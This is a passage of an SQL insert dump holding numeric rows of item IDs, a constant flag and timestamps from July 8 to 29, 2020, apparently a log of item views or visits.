09:58:05'),(4079,3069,1,'2020-07-08','2020-07-08 10:21:57'),(4080,80,1,'2020-07-08','2020-07-08 10:45:48'),(4081,91,1,'2020-07-08','2020-07-08 10:46:41'),(4082,68,1,'2020-07-08','2020-07-08 10:47:17'),(4083,3027,1,'2020-07-08','2020-07-08 11:23:17'),(4084,80,1,'2020-07-08','2020-07-08 12:04:26'),(4085,2813,1,'2020-07-08','2020-07-08 12:39:20'),(4086,2801,1,'2020-07-08','2020-07-08 12:49:48'),(4087,2410,1,'2020-07-08','2020-07-08 12:57:16'),(4088,2609,1,'2020-07-08','2020-07-08 13:04:21'),(4089,2801,1,'2020-07-08','2020-07-08 13:31:34'),(4090,80,1,'2020-07-08','2020-07-08 13:34:47'),(4091,2904,1,'2020-07-08','2020-07-08 14:25:19'),(4092,91,1,'2020-07-08','2020-07-08 14:35:09'),(4093,3097,1,'2020-07-08','2020-07-08 14:48:10'),(4094,1600,1,'2020-07-08','2020-07-08 16:26:32'),(4095,1588,1,'2020-07-08','2020-07-08 17:25:28'),(4096,108,1,'2020-07-08','2020-07-08 17:55:03'),(4097,1588,1,'2020-07-08','2020-07-08 17:55:52'),(4098,3069,1,'2020-07-08','2020-07-08 18:56:30'),(4099,1730,1,'2020-07-08','2020-07-08 19:28:57'),(4100,80,1,'2020-07-08','2020-07-08 21:32:03'),(4101,1600,1,'2020-07-09','2020-07-09 01:49:53'),(4102,1588,1,'2020-07-09','2020-07-09 02:20:03'),(4103,3097,1,'2020-07-09','2020-07-09 03:52:39'),(4104,2904,1,'2020-07-09','2020-07-09 04:10:45'),(4105,2309,1,'2020-07-09','2020-07-09 04:40:38'),(4106,3027,1,'2020-07-09','2020-07-09 05:15:03'),(4107,1739,1,'2020-07-09','2020-07-09 05:51:17'),(4108,80,1,'2020-07-09','2020-07-09 06:10:26'),(4109,1730,1,'2020-07-09','2020-07-09 07:32:25'),(4110,3069,1,'2020-07-09','2020-07-09 07:57:08'),(4111,2813,1,'2020-07-09','2020-07-09 08:10:35'),(4112,2801,1,'2020-07-09','2020-07-09 11:02:06'),(4113,1604,1,'2020-07-09','2020-07-09 11:33:21'),(4114,2801,1,'2020-07-09','2020-07-09 11:40:29'),(4115,1588,1,'2020-07-09','2020-07-09 12:03:22'),(4116,3099,1,'2020-07-09','2020-07-09 12:13:24'),(4117,3096,1,'2020-07-09','2020-07-09 12:23:35'),(4118,72,1,'2020-07-09','2020-07-09 12:33:28'),(4119,2904,1,'2020-07-09','2020-07-09 13:04:10'),(4120,84,1,'2020-07-09','2020-07-09 13:34:03'),(4121,2769,1,'2020-07-09','2020-07-09 13:44:01'),(4122,2309,1,'2020-07-09','2020-07-09 14:25:21'),(4123,486,1,'2020-07-09','2020-07-09 15:11:47'),(4124,1588,1,'2020-07-09','2020-07-09 15:15:14'),(4125,1600,1,'2020-07-09','2020-07-09 15:46:40'),(4126,1600,1,'2020-07-09','2020-07-09 16:25:48'),(4127,80,1,'2020-07-09','2020-07-09 16:45:27'),(4128,2775,1,'2020-07-09','2020-07-09 18:05:57'),(4129,2801,1,'2020-07-09','2020-07-09 20:09:24'),(4130,2813,1,'2020-07-09','2020-07-09 20:14:14'),(4131,1588,1,'2020-07-09','2020-07-09 21:16:29'),(4132,2309,1,'2020-07-09','2020-07-09 23:36:22'),(4133,1588,1,'2020-07-10','2020-07-10 00:06:55'),(4134,1604,1,'2020-07-10','2020-07-10 00:26:52'),(4135,72,1,'2020-07-10','2020-07-10 00:37:03'),(4136,2904,1,'2020-07-10','2020-07-10 00:47:05'),(4137,1600,1,'2020-07-10','2020-07-10 01:07:36'),(4138,1600,1,'2020-07-10','2020-07-10 01:37:11'),(4139,2309,1,'2020-07-10','2020-07-10 05:17:01'),(4140,80,1,'2020-07-10','2020-07-10 05:57:24'),(4141,80,1,'2020-07-10','2020-07-10 08:18:25'),(4142,1600,1,'2020-07-10','2020-07-10 10:48:04'),(4143,1588,1,'2020-07-10','2020-07-10 11:02:09'),(4144,2609,1,'2020-07-10','2020-07-10 11:23:54'),(4145,2801,1,'2020-07-10','2020-07-10 11:40:05'),(4146,68,1,'2020-07-10','2020-07-10 12:20:16'),(4147,2813,1,'2020-07-10','2020-07-10 13:53:20'),(4148,473,1,'2020-07-10','2020-07-10 14:00:26'),(4149,2309,1,'2020-07-10','2020-07-10 14:20:02'),(4150,1606,1,'2020-07-10','2020-07-10 15:41:50'),(4151,1588,1,'2020-07-10','2020-07-10 16:27:36'),(4152,80,1,'2020-07-10','2020-07-10 17:08:16'),(4153,2309,1,'2020-07-10','2020-07-10 18:05:55'),(4154,2309,1,'2020-07-10','2020-07-10 18:05:57'),(4155,1600,1,'2020-07-10','2020-07-10 19:34:40'),(4156,2309,1,'2020-07-10','2020-07-10 19:34:50'),(4157,1588,1,'2020-07-10','2020-07-10 20:53:19'),(4158,2309,1,'2020-07-11','2020-07-11 00:31:38'),(4159,80,1,'2020-07-11','2020-07-11 01:12:01'),(4160,2801,1,'2020-07-11','2020-07-11 01:22:20'),(4161,1588,1,'2020-07-11','2020-07-11 02:21:23'),(4162,3055,1,'2020-07-11','2020-07-11 03:51:36'),(4163,1600,1,'2020-07-11','2020-07-11 04:57:15'),(4164,1600,1,'2020-07-11','2020-07-11 06:28:16'),(4165,2309,1,'2020-07-11','2020-07-11 09:33:46'),(4166,87,1,'2020-07-11','2020-07-11 10:29:15'),(4167,108,1,'2020-07-11','2020-07-11 11:53:58'),(4168,1588,1,'2020-07-11','2020-07-11 12:02:53'),(4169,80,1,'2020-07-11','2020-07-11 12:43:59'),(4170,80,1,'2020-07-11','2020-07-11 12:44:20'),(4171,2309,1,'2020-07-11','2020-07-11 13:03:59'),(4172,1600,1,'2020-07-11','2020-07-11 13:24:07'),(4173,1600,1,'2020-07-11','2020-07-11 17:04:51'),(4174,3072,1,'2020-07-11','2020-07-11 17:05:26'),(4175,1588,1,'2020-07-11','2020-07-11 18:05:39'),(4176,1588,1,'2020-07-11','2020-07-11 20:15:44'),(4177,2309,1,'2020-07-11','2020-07-11 21:16:26'),(4178,2801,1,'2020-07-12','2020-07-12 00:47:22'),(4179,1586,1,'2020-07-12','2020-07-12 02:12:37'),(4180,1600,1,'2020-07-12','2020-07-12 03:08:54'),(4181,1588,1,'2020-07-12','2020-07-12 04:18:50'),(4182,1600,1,'2020-07-12','2020-07-12 04:28:53'),(4183,2309,1,'2020-07-12','2020-07-12 04:48:56'),(4184,80,1,'2020-07-12','2020-07-12 04:59:00'),(4185,2309,1,'2020-07-12','2020-07-12 07:08:20'),(4186,2813,1,'2020-07-12','2020-07-12 08:14:45'),(4187,1780,1,'2020-07-12','2020-07-12 08:20:14'),(4188,80,1,'2020-07-12','2020-07-12 08:40:41'),(4189,1718,1,'2020-07-12','2020-07-12 08:52:48'),(4190,3096,1,'2020-07-12','2020-07-12 10:14:53'),(4191,2457,1,'2020-07-12','2020-07-12 10:30:33'),(4192,2904,1,'2020-07-12','2020-07-12 10:31:22'),(4193,3069,1,'2020-07-12','2020-07-12 10:47:12'),(4194,1730,1,'2020-07-12','2020-07-12 10:51:22'),(4195,1604,1,'2020-07-12','2020-07-12 11:51:37'),(4196,2704,1,'2020-07-12','2020-07-12 12:12:04'),(4197,2801,1,'2020-07-12','2020-07-12 18:34:26'),(4198,3051,1,'2020-07-12','2020-07-12 18:57:54'),(4199,108,1,'2020-07-12','2020-07-12 21:18:04'),(4200,1718,1,'2020-07-12','2020-07-12 21:30:24'),(4201,1600,1,'2020-07-12','2020-07-12 22:58:17'),(4202,2457,1,'2020-07-13','2020-07-13 01:24:36'),(4203,2457,1,'2020-07-13','2020-07-13 01:25:23'),(4204,1600,1,'2020-07-13','2020-07-13 03:39:04'),(4205,2457,1,'2020-07-13','2020-07-13 04:51:17'),(4206,1600,1,'2020-07-13','2020-07-13 07:50:29'),(4207,3038,1,'2020-07-13','2020-07-13 08:33:55'),(4208,108,1,'2020-07-13','2020-07-13 11:21:58'),(4209,1600,1,'2020-07-13','2020-07-13 12:32:27'),(4210,1720,1,'2020-07-13','2020-07-13 13:52:42'),(4211,76,1,'2020-07-13','2020-07-13 14:19:43'),(4212,89,1,'2020-07-13','2020-07-13 14:20:31'),(4213,1614,1,'2020-07-13','2020-07-13 14:20:43'),(4214,1606,1,'2020-07-13','2020-07-13 14:39:31'),(4215,1614,1,'2020-07-13','2020-07-13 16:59:50'),(4216,91,1,'2020-07-13','2020-07-13 19:06:37'),(4217,1600,1,'2020-07-13','2020-07-13 19:47:27'),(4218,1600,1,'2020-07-13','2020-07-13 20:42:23'),(4219,1600,1,'2020-07-13','2020-07-13 21:03:56'),(4220,1600,1,'2020-07-13','2020-07-13 22:08:02'),(4221,108,1,'2020-07-14','2020-07-14 00:38:17'),(4222,3038,1,'2020-07-14','2020-07-14 02:57:29'),(4223,1743,1,'2020-07-14','2020-07-14 08:52:22'),(4224,1600,1,'2020-07-14','2020-07-14 10:26:16'),(4225,1600,1,'2020-07-14','2020-07-14 11:00:37'),(4226,1720,1,'2020-07-14','2020-07-14 11:27:03'),(4227,2617,1,'2020-07-14','2020-07-14 13:29:32'),(4228,3038,1,'2020-07-14','2020-07-14 14:18:34'),(4229,1600,1,'2020-07-14','2020-07-14 15:26:22'),(4230,2309,1,'2020-07-14','2020-07-14 15:38:47'),(4231,3081,1,'2020-07-14','2020-07-14 16:25:03'),(4232,2410,1,'2020-07-15','2020-07-15 07:44:29'),(4233,2309,1,'2020-07-15','2020-07-15 08:55:21'),(4234,570,1,'2020-07-15','2020-07-15 09:01:26'),(4235,1588,1,'2020-07-15','2020-07-15 09:05:56'),(4236,2751,1,'2020-07-15','2020-07-15 10:28:56'),(4237,91,1,'2020-07-15','2020-07-15 11:36:14'),(4238,1737,1,'2020-07-15','2020-07-15 11:55:57'),(4239,1724,1,'2020-07-15','2020-07-15 12:20:07'),(4240,3006,1,'2020-07-15','2020-07-15 12:45:18'),(4241,1606,1,'2020-07-15','2020-07-15 14:05:08'),(4242,76,1,'2020-07-15','2020-07-15 14:05:44'),(4243,76,1,'2020-07-15','2020-07-15 14:06:55'),(4244,1606,1,'2020-07-15','2020-07-15 14:06:59'),(4245,2309,1,'2020-07-15','2020-07-15 14:45:42'),(4246,108,1,'2020-07-15','2020-07-15 20:47:38'),(4247,91,1,'2020-07-15','2020-07-15 21:08:19'),(4248,3097,1,'2020-07-15','2020-07-15 21:09:18'),(4249,2309,1,'2020-07-15','2020-07-15 21:17:39'),(4250,3097,1,'2020-07-15','2020-07-15 21:23:59'),(4251,91,1,'2020-07-15','2020-07-15 21:26:29'),(4252,91,1,'2020-07-15','2020-07-15 21:47:55'),(4253,91,1,'2020-07-15','2020-07-15 22:08:46'),(4254,91,1,'2020-07-15','2020-07-15 22:30:28'),(4255,89,1,'2020-07-15','2020-07-15 22:35:03'),(4256,89,1,'2020-07-15','2020-07-15 22:46:49'),(4257,3107,1,'2020-07-15','2020-07-15 23:13:04'),(4258,89,1,'2020-07-15','2020-07-15 23:19:18'),(4259,108,1,'2020-07-15','2020-07-15 23:28:28'),(4260,3109,1,'2020-07-15','2020-07-15 23:46:49'),(4261,1600,1,'2020-07-15','2020-07-15 23:48:40'),(4262,2309,1,'2020-07-15','2020-07-15 23:59:24'),(4263,3102,1,'2020-07-16','2020-07-16 00:00:11'),(4264,3104,1,'2020-07-16','2020-07-16 00:03:17'),(4265,80,1,'2020-07-16','2020-07-16 00:08:42'),(4266,89,1,'2020-07-16','2020-07-16 00:16:41'),(4267,3079,1,'2020-07-16','2020-07-16 01:28:26'),(4268,1600,1,'2020-07-16','2020-07-16 02:40:39'),(4269,2609,1,'2020-07-16','2020-07-16 04:39:02'),(4270,3104,1,'2020-07-16','2020-07-16 04:45:41'),(4271,3104,1,'2020-07-16','2020-07-16 04:54:52'),(4272,1600,1,'2020-07-16','2020-07-16 05:29:59'),(4273,1588,1,'2020-07-16','2020-07-16 06:10:19'),(4274,1614,1,'2020-07-16','2020-07-16 06:40:17'),(4275,91,1,'2020-07-16','2020-07-16 11:52:13'),(4276,91,1,'2020-07-16','2020-07-16 11:52:22'),(4277,91,1,'2020-07-16','2020-07-16 12:26:12'),(4278,89,1,'2020-07-16','2020-07-16 13:09:03'),(4279,1582,1,'2020-07-16','2020-07-16 13:10:16'),(4280,1586,1,'2020-07-16','2020-07-16 13:10:40'),(4281,89,1,'2020-07-16','2020-07-16 13:12:03'),(4282,1614,1,'2020-07-16','2020-07-16 13:14:05'),(4283,91,1,'2020-07-16','2020-07-16 13:52:38'),(4284,2309,1,'2020-07-16','2020-07-16 15:05:54'),(4285,3038,1,'2020-07-16','2020-07-16 15:29:58'),(4286,1600,1,'2020-07-16','2020-07-16 16:26:23'),(4287,68,1,'2020-07-16','2020-07-16 17:52:13'),(4288,2309,1,'2020-07-16','2020-07-16 18:27:07'),(4289,2751,1,'2020-07-16','2020-07-16 19:14:06'),(4290,1720,1,'2020-07-16','2020-07-16 19:55:09'),(4291,2490,1,'2020-07-16','2020-07-16 21:57:26'),(4292,2557,1,'2020-07-16','2020-07-16 21:59:49'),(4293,2508,1,'2020-07-16','2020-07-16 22:02:25'),(4294,108,1,'2020-07-16','2020-07-16 23:05:47'),(4295,2609,1,'2020-07-16','2020-07-16 23:16:03'),(4296,1604,1,'2020-07-16','2020-07-16 23:38:29'),(4297,1604,1,'2020-07-16','2020-07-16 23:38:36'),(4298,1604,1,'2020-07-16','2020-07-16 23:39:24'),(4299,1604,1,'2020-07-16','2020-07-16 23:39:44'),(4300,1606,1,'2020-07-17','2020-07-17 00:06:00'),(4301,2309,1,'2020-07-17','2020-07-17 02:21:37'),(4302,1600,1,'2020-07-17','2020-07-17 02:41:46'),(4303,1588,1,'2020-07-17','2020-07-17 04:12:41'),(4304,1588,1,'2020-07-17','2020-07-17 05:02:51'),(4305,2309,1,'2020-07-17','2020-07-17 06:02:11'),(4306,2309,1,'2020-07-17','2020-07-17 06:07:09'),(4307,1718,1,'2020-07-17','2020-07-17 07:37:40'),(4308,108,1,'2020-07-17','2020-07-17 08:05:09'),(4309,471,1,'2020-07-17','2020-07-17 15:24:14'),(4310,472,1,'2020-07-17','2020-07-17 15:29:23'),(4311,486,1,'2020-07-17','2020-07-17 15:40:46'),(4312,102,1,'2020-07-17','2020-07-17 15:51:40'),(4313,2150,1,'2020-07-17','2020-07-17 16:34:05'),(4314,1726,1,'2020-07-17','2020-07-17 16:34:23'),(4315,1722,1,'2020-07-17','2020-07-17 16:34:28'),(4316,1713,1,'2020-07-17','2020-07-17 16:41:42'),(4317,1699,1,'2020-07-17','2020-07-17 16:42:05'),(4318,1697,1,'2020-07-17','2020-07-17 16:43:04'),(4319,1872,1,'2020-07-17','2020-07-17 17:08:57'),(4320,474,1,'2020-07-17','2020-07-17 19:31:12'),(4321,470,1,'2020-07-17','2020-07-17 19:40:31'),(4322,108,1,'2020-07-17','2020-07-17 19:59:17'),(4323,2503,1,'2020-07-17','2020-07-17 20:22:09'),(4324,1606,1,'2020-07-17','2020-07-17 20:30:18'),(4325,1588,1,'2020-07-17','2020-07-17 21:46:18'),(4326,2309,1,'2020-07-18','2020-07-18 00:40:59'),(4327,1720,1,'2020-07-18','2020-07-18 01:31:43'),(4328,3038,1,'2020-07-18','2020-07-18 04:32:05'),(4329,1600,1,'2020-07-18','2020-07-18 05:04:17'),(4330,476,1,'2020-07-18','2020-07-18 05:12:34'),(4331,3109,1,'2020-07-18','2020-07-18 06:04:24'),(4332,2609,1,'2020-07-18','2020-07-18 06:54:08'),(4333,1588,1,'2020-07-18','2020-07-18 07:04:40'),(4334,1602,1,'2020-07-18','2020-07-18 07:36:42'),(4335,108,1,'2020-07-18','2020-07-18 07:54:43'),(4336,2989,1,'2020-07-18','2020-07-18 10:34:29'),(4337,1594,1,'2020-07-18','2020-07-18 12:43:32'),(4338,1606,1,'2020-07-18','2020-07-18 13:26:27'),(4339,1600,1,'2020-07-18','2020-07-18 14:06:43'),(4340,2309,1,'2020-07-18','2020-07-18 14:06:45'),(4341,91,1,'2020-07-18','2020-07-18 14:29:21'),(4342,1722,1,'2020-07-18','2020-07-18 14:30:40'),(4343,2063,1,'2020-07-18','2020-07-18 14:35:09'),(4344,2063,1,'2020-07-18','2020-07-18 14:35:13'),(4345,1751,1,'2020-07-18','2020-07-18 14:36:06'),(4346,2152,1,'2020-07-18','2020-07-18 14:36:55'),(4347,108,1,'2020-07-18','2020-07-18 15:17:04'),(4348,2159,1,'2020-07-18','2020-07-18 16:03:58'),(4349,2165,1,'2020-07-18','2020-07-18 16:09:02'),(4350,2989,1,'2020-07-18','2020-07-18 16:17:29'),(4351,1711,1,'2020-07-18','2020-07-18 17:00:51'),(4352,2063,1,'2020-07-18','2020-07-18 17:18:15'),(4353,1782,1,'2020-07-18','2020-07-18 17:40:58'),(4354,473,1,'2020-07-18','2020-07-18 18:41:43'),(4355,486,1,'2020-07-18','2020-07-18 19:44:31'),(4356,2395,1,'2020-07-18','2020-07-18 20:59:41'),(4357,570,1,'2020-07-18','2020-07-18 21:49:41'),(4358,570,1,'2020-07-18','2020-07-18 21:57:57'),(4359,1728,1,'2020-07-19','2020-07-19 00:01:10'),(4360,1600,1,'2020-07-19','2020-07-19 09:05:07'),(4361,91,1,'2020-07-19','2020-07-19 09:14:31'),(4362,1600,1,'2020-07-19','2020-07-19 09:18:57'),(4363,473,1,'2020-07-19','2020-07-19 09:26:02'),(4364,471,1,'2020-07-19','2020-07-19 09:30:00'),(4365,485,1,'2020-07-19','2020-07-19 12:04:05'),(4366,483,1,'2020-07-19','2020-07-19 12:04:08'),(4367,481,1,'2020-07-19','2020-07-19 12:04:10'),(4368,484,1,'2020-07-19','2020-07-19 12:04:35'),(4369,1588,1,'2020-07-19','2020-07-19 12:15:48'),(4370,1614,1,'2020-07-19','2020-07-19 13:56:44'),(4371,1614,1,'2020-07-19','2020-07-19 13:56:59'),(4372,3034,1,'2020-07-19','2020-07-19 16:31:34'),(4373,2309,1,'2020-07-19','2020-07-19 16:36:52'),(4374,2751,1,'2020-07-19','2020-07-19 17:54:35'),(4375,2309,1,'2020-07-19','2020-07-19 20:39:20'),(4376,91,1,'2020-07-19','2020-07-19 21:04:32'),(4377,3038,1,'2020-07-19','2020-07-19 22:20:22'),(4378,2658,1,'2020-07-20','2020-07-20 00:47:39'),(4379,1600,1,'2020-07-20','2020-07-20 03:31:32'),(4380,1600,1,'2020-07-20','2020-07-20 03:54:33'),(4381,1600,1,'2020-07-20','2020-07-20 04:14:31'),(4382,3034,1,'2020-07-20','2020-07-20 04:23:55'),(4383,1596,1,'2020-07-20','2020-07-20 10:00:18'),(4384,1596,1,'2020-07-20','2020-07-20 10:01:38'),(4385,1604,1,'2020-07-20','2020-07-20 11:39:42'),(4386,1604,1,'2020-07-20','2020-07-20 11:39:43'),(4387,68,1,'2020-07-20','2020-07-20 14:43:09'),(4388,2410,1,'2020-07-20','2020-07-20 17:07:21'),(4389,3038,1,'2020-07-20','2020-07-20 17:36:12'),(4390,1604,1,'2020-07-21','2020-07-21 06:00:41'),(4391,2457,1,'2020-07-21','2020-07-21 07:51:42'),(4392,1604,1,'2020-07-21','2020-07-21 09:07:12'),(4393,89,1,'2020-07-21','2020-07-21 10:01:47'),(4394,1588,1,'2020-07-21','2020-07-21 10:02:41'),(4395,2751,1,'2020-07-21','2020-07-21 11:49:17'),(4396,2309,1,'2020-07-21','2020-07-21 11:54:19'),(4397,1600,1,'2020-07-21','2020-07-21 12:05:50'),(4398,108,1,'2020-07-21','2020-07-21 12:18:37'),(4399,91,1,'2020-07-21','2020-07-21 12:36:56'),(4400,1590,1,'2020-07-21','2020-07-21 13:12:24'),(4401,2609,1,'2020-07-21','2020-07-21 16:50:39'),(4402,2609,1,'2020-07-21','2020-07-21 22:08:10'),(4403,1588,1,'2020-07-21','2020-07-21 22:18:02'),(4404,1730,1,'2020-07-21','2020-07-21 23:18:29'),(4405,1600,1,'2020-07-21','2020-07-21 23:49:00'),(4406,3087,1,'2020-07-22','2020-07-22 07:46:18'),(4407,1614,1,'2020-07-22','2020-07-22 08:54:34'),(4408,3102,1,'2020-07-22','2020-07-22 10:43:17'),(4409,1600,1,'2020-07-22','2020-07-22 10:46:11'),(4410,80,1,'2020-07-22','2020-07-22 10:46:27'),(4411,89,1,'2020-07-22','2020-07-22 11:12:42'),(4412,3104,1,'2020-07-22','2020-07-22 12:42:52'),(4413,1600,1,'2020-07-22','2020-07-22 14:25:27'),(4414,3081,1,'2020-07-22','2020-07-22 16:46:09'),(4415,1606,1,'2020-07-22','2020-07-22 17:55:21'),(4416,1606,1,'2020-07-22','2020-07-22 17:55:32'),(4417,1606,1,'2020-07-22','2020-07-22 18:04:56'),(4418,3081,1,'2020-07-23','2020-07-23 00:42:55'),(4419,1870,1,'2020-07-23','2020-07-23 00:47:24'),(4420,3058,1,'2020-07-23','2020-07-23 00:57:15'),(4421,1600,1,'2020-07-23','2020-07-23 01:39:21'),(4422,482,1,'2020-07-23','2020-07-23 03:18:57'),(4423,1870,1,'2020-07-23','2020-07-23 05:08:50'),(4424,2609,1,'2020-07-23','2020-07-23 09:13:31'),(4425,2609,1,'2020-07-23','2020-07-23 09:31:17'),(4426,3005,1,'2020-07-23','2020-07-23 12:08:30'),(4427,3030,1,'2020-07-23','2020-07-23 15:37:33'),(4428,1774,1,'2020-07-23','2020-07-23 16:58:22'),(4429,3069,1,'2020-07-24','2020-07-24 01:40:40'),(4430,3090,1,'2020-07-24','2020-07-24 01:46:28'),(4431,2159,1,'2020-07-24','2020-07-24 07:18:39'),(4432,76,1,'2020-07-24','2020-07-24 09:24:35'),(4433,76,1,'2020-07-24','2020-07-24 09:25:09'),(4434,89,1,'2020-07-24','2020-07-24 10:06:43'),(4435,1588,1,'2020-07-24','2020-07-24 10:07:42'),(4436,3087,1,'2020-07-24','2020-07-24 13:14:24'),(4437,80,1,'2020-07-24','2020-07-24 14:12:19'),(4438,1588,1,'2020-07-24','2020-07-24 14:50:11'),(4439,1588,1,'2020-07-24','2020-07-24 15:00:54'),(4440,3081,1,'2020-07-24','2020-07-24 15:05:06'),(4441,80,1,'2020-07-24','2020-07-24 17:30:51'),(4442,3030,1,'2020-07-25','2020-07-25 01:56:48'),(4443,3030,1,'2020-07-25','2020-07-25 04:44:20'),(4444,3030,1,'2020-07-25','2020-07-25 18:02:38'),(4445,1870,1,'2020-07-25','2020-07-25 19:28:01'),(4446,486,1,'2020-07-26','2020-07-26 01:34:43'),(4447,3081,1,'2020-07-26','2020-07-26 01:54:26'),(4448,1606,1,'2020-07-26','2020-07-26 06:42:37'),(4449,1606,1,'2020-07-26','2020-07-26 06:46:22'),(4450,2989,1,'2020-07-26','2020-07-26 11:27:31'),(4451,3092,1,'2020-07-26','2020-07-26 11:37:00'),(4452,2911,1,'2020-07-26','2020-07-26 11:43:55'),(4453,2991,1,'2020-07-26','2020-07-26 12:07:43'),(4454,2410,1,'2020-07-26','2020-07-26 13:07:43'),(4455,2161,1,'2020-07-26','2020-07-26 14:56:58'),(4456,2178,1,'2020-07-26','2020-07-26 16:58:19'),(4457,1705,1,'2020-07-26','2020-07-26 17:11:19'),(4458,479,1,'2020-07-26','2020-07-26 17:11:54'),(4459,2804,1,'2020-07-26','2020-07-26 17:26:44'),(4460,2964,1,'2020-07-26','2020-07-26 18:19:27'),(4461,1780,1,'2020-07-26','2020-07-26 18:49:34'),(4462,3034,1,'2020-07-26','2020-07-26 19:09:48'),(4463,2989,1,'2020-07-26','2020-07-26 19:33:29'),(4464,3097,1,'2020-07-26','2020-07-26 20:12:53'),(4465,3030,1,'2020-07-26','2020-07-26 20:22:37'),(4466,1703,1,'2020-07-26','2020-07-26 20:51:00'),(4467,486,1,'2020-07-26','2020-07-26 22:06:30'),(4468,2296,1,'2020-07-27','2020-07-27 01:24:32'),(4469,1600,1,'2020-07-27','2020-07-27 01:33:36'),(4470,2156,1,'2020-07-27','2020-07-27 01:42:20'),(4471,470,1,'2020-07-27','2020-07-27 06:54:50'),(4472,3092,1,'2020-07-27','2020-07-27 08:39:32'),(4473,2161,1,'2020-07-27','2020-07-27 08:49:17'),(4474,3030,1,'2020-07-27','2020-07-27 10:14:55'),(4475,3030,1,'2020-07-27','2020-07-27 12:54:55'),(4476,1737,1,'2020-07-27','2020-07-27 13:26:29'),(4477,3099,1,'2020-07-27','2020-07-27 13:46:27'),(4478,1709,1,'2020-07-27','2020-07-27 19:53:34'),(4479,1728,1,'2020-07-27','2020-07-27 20:41:06'),(4480,3092,1,'2020-07-28','2020-07-28 00:12:13'),(4481,2161,1,'2020-07-28','2020-07-28 03:33:59'),(4482,3030,1,'2020-07-28','2020-07-28 03:37:53'),(4483,1600,1,'2020-07-28','2020-07-28 09:56:39'),(4484,2904,1,'2020-07-28','2020-07-28 10:13:55'),(4485,1695,1,'2020-07-28','2020-07-28 11:47:26'),(4486,1614,1,'2020-07-28','2020-07-28 12:05:53'),(4487,87,1,'2020-07-28','2020-07-28 12:09:58'),(4488,482,1,'2020-07-28','2020-07-28 12:10:38'),(4489,87,1,'2020-07-28','2020-07-28 12:10:45'),(4490,488,1,'2020-07-28','2020-07-28 12:10:50'),(4491,87,1,'2020-07-28','2020-07-28 12:12:28'),(4492,487,1,'2020-07-28','2020-07-28 12:12:32'),(4493,87,1,'2020-07-28','2020-07-28 12:12:58'),(4494,486,1,'2020-07-28','2020-07-28 12:13:03'),(4495,87,1,'2020-07-28','2020-07-28 12:31:43'),(4496,483,1,'2020-07-28','2020-07-28 12:31:51'),(4497,87,1,'2020-07-28','2020-07-28 12:31:56'),(4498,2309,1,'2020-07-28','2020-07-28 12:54:48'),(4499,2617,1,'2020-07-28','2020-07-28 12:59:00'),(4500,2609,1,'2020-07-28','2020-07-28 13:03:46'),(4501,1600,1,'2020-07-28','2020-07-28 13:13:53'),(4502,2801,1,'2020-07-28','2020-07-28 13:31:01'),(4503,80,1,'2020-07-28','2020-07-28 13:43:59'),(4504,3069,1,'2020-07-28','2020-07-28 14:49:11'),(4505,1705,1,'2020-07-28','2020-07-28 15:14:45'),(4506,1604,1,'2020-07-28','2020-07-28 15:25:33'),(4507,3060,1,'2020-07-28','2020-07-28 15:40:14'),(4508,2609,1,'2020-07-28','2020-07-28 15:55:09'),(4509,1614,1,'2020-07-28','2020-07-28 16:24:41'),(4510,1604,1,'2020-07-28','2020-07-28 16:52:50'),(4511,3005,1,'2020-07-28','2020-07-28 17:12:51'),(4512,2769,1,'2020-07-28','2020-07-28 18:03:27'),(4513,1730,1,'2020-07-28','2020-07-28 18:23:01'),(4514,2751,1,'2020-07-28','2020-07-28 18:43:01'),(4515,1608,1,'2020-07-28','2020-07-28 18:54:37'),(4516,102,1,'2020-07-28','2020-07-28 19:28:33'),(4517,570,1,'2020-07-28','2020-07-28 19:30:31'),(4518,2813,1,'2020-07-28','2020-07-28 19:43:21'),(4519,80,1,'2020-07-28','2020-07-28 19:45:39'),(4520,480,1,'2020-07-28','2020-07-28 20:42:22'),(4521,1766,1,'2020-07-28','2020-07-28 20:43:37'),(4522,1582,1,'2020-07-28','2020-07-28 20:54:23'),(4523,1739,1,'2020-07-28','2020-07-28 21:54:17'),(4524,76,1,'2020-07-28','2020-07-28 22:14:48'),(4525,2801,1,'2020-07-28','2020-07-28 22:57:35'),(4526,3097,1,'2020-07-28','2020-07-28 23:10:04'),(4527,2813,1,'2020-07-28','2020-07-28 23:20:37'),(4528,2457,1,'2020-07-28','2020-07-28 23:37:07'),(4529,72,1,'2020-07-29','2020-07-29 00:29:11'),(4530,1614,1,'2020-07-29','2020-07-29 00:39:06'),(4531,2457,1,'2020-07-29','2020-07-29 00:56:35'),(4532,1588,1,'2020-07-29','2020-07-29 01:59:51'),(4533,1768,1,'2020-07-29','2020-07-29 02:02:34'),(4534,1588,1,'2020-07-29','2020-07-29 02:03:34'),(4535,1604,1,'2020-07-29','2020-07-29 02:13:01'),(4536,3006,1,'2020-07-29','2020-07-29 02:35:51'),(4537,1695,1,'2020-07-29','2020-07-29 03:07:18'),(4538,80,1,'2020-07-29','2020-07-29 03:18:27'),(4539,2309,1,'2020-07-29','2020-07-29 04:33:55'),(4540,2609,1,'2020-07-29','2020-07-29 05:14:07'),(4541,2801,1,'2020-07-29','2020-07-29 05:33:08'),(4542,2309,1,'2020-07-29','2020-07-29 06:01:01'),(4543,3069,1,'2020-07-29','2020-07-29 06:03:06'),(4544,1600,1,'2020-07-29','2020-07-29 07:06:34'),(4545,2178,1,'2020-07-29','2020-07-29 07:19:46'),(4546,2904,1,'2020-07-29','2020-07-29 08:56:23'),(4547,2296,1,'2020-07-29','2020-07-29 09:04:47'),(4548,3102,1,'2020-07-29','2020-07-29 09:38:13'),(4549,1730,1,'2020-07-29','2020-07-29 09:45:30'),(4550,1614,1,'2020-07-29','2020-07-29 09:48:29'),(4551,89,1,'2020-07-29','2020-07-29 09:49:34'),(4552,570,1,'2020-07-29','2020-07-29 10:01:40'),(4553,2769,1,'2020-07-29','2020-07-29 10:26:16'),(4554,1588,1,'2020-07-29','2020-07-29 10:46:48'),(4555,3107,1,'2020-07-29','2020-07-29 11:03:20'),(4556,3027,1,'2020-07-29','2020-07-29 12:05:11'),(4557,2309,1,'2020-07-29','2020-07-29 12:56:19'),(4558,1718,1,'2020-07-29','2020-07-29 12:58:07'),(4559,89,1,'2020-07-29','2020-07-29 13:06:19'),(4560,1588,1,'2020-07-29','2020-07-29 13:29:15'),(4561,3107,1,'2020-07-29','2020-07-29 13:31:42'),(4562,3107,1,'2020-07-29','2020-07-29 13:33:49'),(4563,3107,1,'2020-07-29','2020-07-29 13:35:00'),(4564,1588,1,'2020-07-29','2020-07-29 13:35:07'),(4565,1604,1,'2020-07-29','2020-07-29 